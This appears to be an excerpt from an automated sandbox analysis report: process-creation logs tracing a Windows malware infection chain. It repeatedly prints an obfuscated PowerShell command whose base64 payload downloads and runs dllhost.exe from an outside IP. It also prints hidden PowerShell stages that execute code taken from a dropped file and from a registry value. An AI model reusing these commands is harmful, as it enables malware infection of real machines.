          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Suspicious command line found
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
